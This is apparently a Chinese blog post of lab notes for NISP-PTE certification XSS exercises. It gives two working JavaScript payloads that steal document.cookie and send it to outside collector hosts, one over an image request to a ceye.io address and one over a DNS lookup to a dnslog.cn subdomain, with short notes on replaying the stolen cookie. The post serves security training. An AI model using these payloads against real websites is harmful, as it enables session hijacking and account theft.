NISP-PTE基础实操——XSS

忘川w2025-07-22 8:04

pteXSS模拟1

html 复制代码

<script>
var img
=document.createElement("img");img.src="http://xxxxx.ceye.io/log?"+escape(document.coo
kie);document.body.appendChild(img);
</script>

重放加Cookie头

pteXSS模拟2

<script type="text/javascript">

var arr=document.cookie.split(/[;=]/);var url="http://"+arr[1]+".e0nv60.dnslog.cn/xxx.png";document.write('<img src="'+url+'"/>');

</script>

提交表单并刷新看dns返回记录

DNSLog Platform

pteXSS模拟3

尝试发现是除了大写外过滤

上一篇：从一开始的网络攻防（四）：XSS

下一篇：XSS Game前八关

热门推荐

01【2025.7.18】更新vscode后所有.vue文件template标签后报红的临时解决办法，Vue - Official 插件3.0.2导致 02全球最强模型Grok4，国内已可免费使用！（附教程）03这次领先Cursor！体验了Trae 2.0 SOLO 模式，超酷！04Cursor Claude 模型无法使用的解决方法 05KGG转MP3工具|非KGM文件|解密音频 06Cursor限制国内用户使用Claude模型？附简单解决方案！07Vue (Official) v3.0.2 新特性为非类npm环境引入 globalTypesPath 选项 08赛博保姆出列！Gemini CLI & Claude Code + Kimi 手把手教程 09Claude Code 最新版已经支持 Windows 安装使用！10【暑期多校补题记录】2025牛客多校(1)(2) 杭电多校(1)